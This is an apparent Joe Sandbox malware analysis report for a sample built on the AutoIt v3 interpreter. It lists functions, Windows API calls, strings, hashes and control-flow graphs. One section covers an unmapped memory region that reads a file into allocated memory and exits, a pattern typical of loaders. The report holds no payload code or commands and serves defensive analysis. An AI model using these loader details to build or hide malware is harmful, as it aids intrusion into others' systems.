                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Variable must be of type 'Object'.
                                                                  • API String ID: 0-109567571
                                                                  • Opcode ID: 879c796b6b7a6b68611e2c7761a14e33bba8899d63e342335064bb3aa81693b5
                                                                  • Instruction ID: 43ba7f2c16345c063ec0ba216574686ec65c435d6dd910999409589569e1d351
                                                                  • Opcode Fuzzy Hash: 879c796b6b7a6b68611e2c7761a14e33bba8899d63e342335064bb3aa81693b5
                                                                  • Instruction Fuzzy Hash: F2A27B75A0021DCFCB24CF68C480ABAB7B2FF58314F248169EA55EB361D775AD42CB91
                                                                  Function 009009D0 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00900A5B
                                                                  • timeGetTime.WINMM ref: 00900D16
                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00900E53
                                                                  • Sleep.KERNEL32(0000000A), ref: 00900E61
                                                                  • LockWindowUpdate.USER32(00000000,?,?), ref: 00900EFA
                                                                  • DestroyWindow.USER32 ref: 00900F06
                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00900F20
                                                                  • Sleep.KERNEL32(0000000A,?,?), ref: 00934E83
                                                                  • TranslateMessage.USER32(?), ref: 00935C60
                                                                  • DispatchMessageW.USER32(?), ref: 00935C6E
                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00935C82
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                                  • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                  • API String ID: 4212290369-3242690629
                                                                  • Opcode ID: c139d928bc72d7608e25fd6f459e0aea4453cf51f86731434e7027eb3e9f2dde
                                                                  • Instruction ID: 29e63546ab5f4eceb11c0d4e5bcd706ad81aaffb2f83fb74a13a5487004c8088
                                                                  • Opcode Fuzzy Hash: c139d928bc72d7608e25fd6f459e0aea4453cf51f86731434e7027eb3e9f2dde
                                                                  • Instruction Fuzzy Hash: 88B2DF70608741DFD728DF24C884BAAB7E9FF88304F15491DE59A972A1CB75E884DF82
                                                                  Function 00959155 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 00958F5F: __time64.LIBCMT ref: 00958F69
                                                                    • Part of subcall function 008F4EE5: _fseek.LIBCMT ref: 008F4EFD
                                                                  • __wsplitpath.LIBCMT ref: 00959234
                                                                    • Part of subcall function 009140FB: __wsplitpath_helper.LIBCMT ref: 0091413B
                                                                  • _wcscpy.LIBCMT ref: 00959247
                                                                  • _wcscat.LIBCMT ref: 0095925A
                                                                  • __wsplitpath.LIBCMT ref: 0095927F
                                                                  • _wcscat.LIBCMT ref: 00959295
                                                                  • _wcscat.LIBCMT ref: 009592A8
                                                                    • Part of subcall function 00958FA5: _memmove.LIBCMT ref: 00958FDE
                                                                    • Part of subcall function 00958FA5: _memmove.LIBCMT ref: 00958FED
                                                                  • _wcscmp.LIBCMT ref: 009591EF
                                                                    • Part of subcall function 00959734: _wcscmp.LIBCMT ref: 00959824
                                                                    • Part of subcall function 00959734: _wcscmp.LIBCMT ref: 00959837
                                                                  • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00959452
                                                                  • _wcsncpy.LIBCMT ref: 009594C5
                                                                  • DeleteFileW.KERNEL32(?,?), ref: 009594FB
                                                                  • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00959511
                                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00959522
                                                                  • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00959534
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                  • String ID:
                                                                  • API String ID: 1500180987-0
                                                                  • Opcode ID: 7148c4800ca19ed6e347f3b71ae94e379dca37e563746256ddae9433e710d111
                                                                  • Instruction ID: 6bcfe29739a52b68e90cda16f88b6de852ca2269bccf87dd7c558116d0c261c1
                                                                  • Opcode Fuzzy Hash: 7148c4800ca19ed6e347f3b71ae94e379dca37e563746256ddae9433e710d111
                                                                  • Instruction Fuzzy Hash: 12C10EB1D0021DAADF11DFA5CC85ADEB7BDEF85310F0044A6FA09E7151EB309A898F65
                                                                  Function 008F3015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 71windowregistryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetSysColorBrush.USER32(0000000F), ref: 008F3074
                                                                  • RegisterClassExW.USER32(00000030), ref: 008F309E
                                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008F30AF
                                                                  • InitCommonControlsEx.COMCTL32(?), ref: 008F30CC
                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008F30DC
                                                                  • LoadIconW.USER32(000000A9), ref: 008F30F2
                                                                  • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 008F3101
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                  • API String ID: 2914291525-1005189915
                                                                  • Opcode ID: 72fa0a09a0a3c7f1a660ef671c24706bfbd8dffb3e68840fe7a681a89d1de6bc
                                                                  • Instruction ID: 743f0e9773b36976256c4382f41aeca9ff710fb6f77a66b3e0103a84707e83ea
                                                                  • Opcode Fuzzy Hash: 72fa0a09a0a3c7f1a660ef671c24706bfbd8dffb3e68840fe7a681a89d1de6bc
                                                                  • Instruction Fuzzy Hash: 82314972959349AFDB11CFA4E885B8DBBF0FB08320F14462EE584E62A0D3B50585DF40
                                                                  Function 008F3041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetSysColorBrush.USER32(0000000F), ref: 008F3074
                                                                  • RegisterClassExW.USER32(00000030), ref: 008F309E
                                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008F30AF
                                                                  • InitCommonControlsEx.COMCTL32(?), ref: 008F30CC
                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008F30DC
                                                                  • LoadIconW.USER32(000000A9), ref: 008F30F2
                                                                  • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 008F3101
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                  • API String ID: 2914291525-1005189915
                                                                  • Opcode ID: 6b398a0b5fb08c6a288ea25a409171a026e839abf0c878da13307d6817acecc3
                                                                  • Instruction ID: cbf578758fb5b14b9fb48e5879b72d19b9f60301427bf0b60bb5989ade3a853e
                                                                  • Opcode Fuzzy Hash: 6b398a0b5fb08c6a288ea25a409171a026e839abf0c878da13307d6817acecc3
                                                                  • Instruction Fuzzy Hash: 8621C9B2969218AFDB00DFA4ED49B9DBBF4FB08710F10422AF514B62A0D7B14584DF95
                                                                  Function 008F708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 008F4706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,009B52F8,?,008F37AE,?), ref: 008F4724
                                                                    • Part of subcall function 0091050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,008F7165), ref: 0091052D
                                                                  • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 008F71A8
                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0092E8C8
                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0092E909
                                                                  • RegCloseKey.ADVAPI32(?), ref: 0092E947
                                                                  • _wcscat.LIBCMT ref: 0092E9A0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                  • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                  • API String ID: 2673923337-2727554177
                                                                  • Opcode ID: be55a720a02ed08af8612fc00f5bf83fc5072b507644a491fe21ba278128df2b
                                                                  • Instruction ID: e52cee4bda2fc391f92ffd99e25d1bf1534f9146bff53f935a143d8513e6d050
                                                                  • Opcode Fuzzy Hash: be55a720a02ed08af8612fc00f5bf83fc5072b507644a491fe21ba278128df2b
                                                                  • Instruction Fuzzy Hash: 6371E3315183059EE304EF29ED819ABBBF8FF85320F40062EF554C72A0DB74A988DB52
                                                                  Function 008F3A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetSysColorBrush.USER32(0000000F), ref: 008F3A50
                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 008F3A5F
                                                                  • LoadIconW.USER32(00000063), ref: 008F3A76
                                                                  • LoadIconW.USER32(000000A4), ref: 008F3A88
                                                                  • LoadIconW.USER32(000000A2), ref: 008F3A9A
                                                                  • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 008F3AC0
                                                                  • RegisterClassExW.USER32(?), ref: 008F3B16
                                                                    • Part of subcall function 008F3041: GetSysColorBrush.USER32(0000000F), ref: 008F3074
                                                                    • Part of subcall function 008F3041: RegisterClassExW.USER32(00000030), ref: 008F309E
                                                                    • Part of subcall function 008F3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008F30AF
                                                                    • Part of subcall function 008F3041: InitCommonControlsEx.COMCTL32(?), ref: 008F30CC
                                                                    • Part of subcall function 008F3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008F30DC
                                                                    • Part of subcall function 008F3041: LoadIconW.USER32(000000A9), ref: 008F30F2
                                                                    • Part of subcall function 008F3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 008F3101
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                  • String ID: #$0$AutoIt v3
                                                                  • API String ID: 423443420-4155596026
                                                                  • Opcode ID: 9052c59931aceacb00805a99b094085fa3f823feed913ed0345bd27bf79991d8
                                                                  • Instruction ID: a0f32f4924e3a72e712ef3cccf9220a306e31be1151115c10b45b666bc25585e
                                                                  • Opcode Fuzzy Hash: 9052c59931aceacb00805a99b094085fa3f823feed913ed0345bd27bf79991d8
                                                                  • Instruction Fuzzy Hash: 70217171D2A708AFDF15DFA4ED05B9D7BB0FB08721F00021AF614A62B1C3B55940AF80
                                                                  Function 008F3633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 767 8f3633-8f3681 769 8f3683-8f3686 767->769 770 8f36e1-8f36e3 767->770 771 8f3688-8f368f 769->771 772 8f36e7 769->772 770->769 773 8f36e5 770->773 774 8f374b-8f3753 PostQuitMessage 771->774 775 8f3695-8f369a 771->775 777 8f36ed-8f36f0 772->777 778 92d0cc-92d0fa call 901070 call 901093 772->778 776 8f36ca-8f36d2 DefWindowProcW 773->776 782 8f3711-8f3713 774->782 780 92d154-92d168 call 952527 775->780 781 8f36a0-8f36a2 775->781 783 8f36d8-8f36de 776->783 784 8f3715-8f373c SetTimer RegisterWindowMessageW 777->784 785 8f36f2-8f36f3 777->785 812 92d0ff-92d106 778->812 780->782 806 92d16e 780->806 787 8f36a8-8f36ad 781->787 788 8f3755-8f375f call 8f44a0 781->788 782->783 784->782 789 8f373e-8f3749 CreatePopupMenu 784->789 791 8f36f9-8f370c KillTimer call 8f443a call 8f3114 785->791 792 92d06f-92d072 785->792 795 92d139-92d140 787->795 796 8f36b3-8f36b8 787->796 807 8f3764 788->807 789->782 791->782 799 92d074-92d076 792->799 800 92d0a8-92d0c7 MoveWindow 792->800 795->776 802 92d146-92d14f call 947c36 795->802 804 8f36be-8f36c4 796->804 805 92d124-92d134 call 952d36 796->805 808 92d097-92d0a3 SetFocus 799->808 809 92d078-92d07b 799->809 800->782 802->776 804->776 804->812 805->782 806->776 807->782 808->782 809->804 813 92d081-92d092 call 901070 809->813 812->776 817 92d10c-92d11f call 8f443a call 8f434a 812->817 813->782 817->776
                                                                  APIs
                                                                  • DefWindowProcW.USER32(?,?,?,?), ref: 008F36D2
                                                                  • KillTimer.USER32(?,00000001), ref: 008F36FC
                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 008F371F
                                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008F372A
                                                                  • CreatePopupMenu.USER32 ref: 008F373E
                                                                  • PostQuitMessage.USER32(00000000), ref: 008F374D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                  • String ID: TaskbarCreated
                                                                  • API String ID: 129472671-2362178303
                                                                  • Opcode ID: 60d41cd4e0d20fb370c4e0559b2493c08ee857822ef24b875033855129e734d3
                                                                  • Instruction ID: b766834f1d72d5d9c3c596418325c7d62bff2c909819e4a872c37f92998040ad
                                                                  • Opcode Fuzzy Hash: 60d41cd4e0d20fb370c4e0559b2493c08ee857822ef24b875033855129e734d3
                                                                  • Instruction Fuzzy Hash: 504134B222960DBBDB257F78ED09BB93698FB10311F100235F702E62B5DB649E40B365
                                                                  Function 008F3766 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                                  • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                                  • API String ID: 1825951767-3513169116
                                                                  • Opcode ID: 68d9b48a32cb1a14dcebce09abd5aeea48cda00b11566e3e4fe50b0974d44c0b
                                                                  • Instruction ID: 2e5b14ce0c64310c5f2b2cec124c0358424890f2c66b6fbeccd79da097612bf3
                                                                  • Opcode Fuzzy Hash: 68d9b48a32cb1a14dcebce09abd5aeea48cda00b11566e3e4fe50b0974d44c0b
                                                                  • Instruction Fuzzy Hash: 5DA1597291422D9ADB05EBB8DC91AFEBB78FF54310F40042AE616F7191EF745A08CB61
                                                                  Function 01415450 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 942 1415450-14154fe call 1412e60 945 1415505-141552b call 1416360 CreateFileW 942->945 948 1415532-1415542 945->948 949 141552d 945->949 954 1415544 948->954 955 1415549-1415563 VirtualAlloc 948->955 950 141567d-1415681 949->950 952 14156c3-14156c6 950->952 953 1415683-1415687 950->953 956 14156c9-14156d0 952->956 957 1415693-1415697 953->957 958 1415689-141568c 953->958 954->950 959 1415565 955->959 960 141556a-1415581 ReadFile 955->960 961 14156d2-14156dd 956->961 962 1415725-141573a 956->962 963 14156a7-14156ab 957->963 964 1415699-14156a3 957->964 958->957 959->950 969 1415583 960->969 970 1415588-14155c8 VirtualAlloc 960->970 971 14156e1-14156ed 961->971 972 14156df 961->972 965 141574a-1415752 962->965 966 141573c-1415747 VirtualFree 962->966 967 14156bb 963->967 968 14156ad-14156b7 963->968 964->963 966->965 967->952 968->967 969->950 973 14155ca 970->973 974 14155cf-14155ea call 14165b0 970->974 975 1415701-141570d 971->975 976 14156ef-14156ff 971->976 972->962 973->950 982 14155f5-14155ff 974->982 979 141571a-1415720 975->979 980 141570f-1415718 975->980 978 1415723 976->978 978->956 979->978 980->978 983 1415601-1415630 call 14165b0 982->983 984 1415632-1415646 call 14163c0 982->984 983->982 990 1415648 984->990 991 141564a-141564e 984->991 990->950 992 1415650-1415654 CloseHandle 991->992 993 141565a-141565e 991->993 992->993 994 1415660-141566b VirtualFree 993->994 995 141566e-1415677 993->995 994->995 995->945 995->950
                                                                  APIs
                                                                  • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01415521
                                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01415747
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1285208597.0000000001412000.00000040.00000020.00020000.00000000.sdmp, Offset: 01412000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1412000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFileFreeVirtual
                                                                  • String ID:
                                                                  • API String ID: 204039940-0
                                                                  • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                                  • Instruction ID: 138406e8eccffdfdf7c4208fdde930f1419a84980caa13b0e925b70b596ae503
                                                                  • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                                  • Instruction Fuzzy Hash: F5A15870E00208EBDB14CFA4D884BEEBBB5FF89304F20855AE205BB294D7759A41CF94
                                                                  Function 008F39D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1073 8f39d5-8f3a45 CreateWindowExW * 2 ShowWindow * 2
                                                                  APIs
                                                                  • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 008F3A03
                                                                  • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 008F3A24
                                                                  • ShowWindow.USER32(00000000,?,?), ref: 008F3A38
                                                                  • ShowWindow.USER32(00000000,?,?), ref: 008F3A41
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Window$CreateShow
                                                                  • String ID: AutoIt v3$edit
                                                                  • API String ID: 1584632944-3779509399
                                                                  • Opcode ID: d4653c46a9c0f32715524e30a30efc68b352f499549c5d278cc1b9abe4ea2ec9
                                                                  • Instruction ID: 8c8fbdfe9fd3c236f171ff3509d9faeb5cffb04b3f6c6854dd0849125c9115c6
                                                                  • Opcode Fuzzy Hash: d4653c46a9c0f32715524e30a30efc68b352f499549c5d278cc1b9abe4ea2ec9
                                                                  • Instruction Fuzzy Hash: 25F05E71626694BEEA3167236C1DF3B3E7DD7C6F60F02422EB914B2270C2710840EAB0
                                                                  Function 01415210 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 148fileCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1074 1415210-1415348 call 1412e60 call 1415100 CreateFileW 1081 141534a 1074->1081 1082 141534f-141535f 1074->1082 1083 14153ff-1415404 1081->1083 1085 1415361 1082->1085 1086 1415366-1415380 VirtualAlloc 1082->1086 1085->1083 1087 1415382 1086->1087 1088 1415384-141539b ReadFile 1086->1088 1087->1083 1089 141539d 1088->1089 1090 141539f-14153d9 call 1415140 call 1414100 1088->1090 1089->1083 1095 14153f5-14153fd ExitProcess 1090->1095 1096 14153db-14153f0 call 1415190 1090->1096 1095->1083 1096->1095
                                                                  APIs
                                                                    • Part of subcall function 01415100: Sleep.KERNELBASE(000001F4), ref: 01415111
                                                                  • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0141533E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1285208597.0000000001412000.00000040.00000020.00020000.00000000.sdmp, Offset: 01412000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1412000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFileSleep
                                                                  • String ID: FJEN375KJ8P1S6KL1POJKMGVTY
                                                                  • API String ID: 2694422964-3339406231
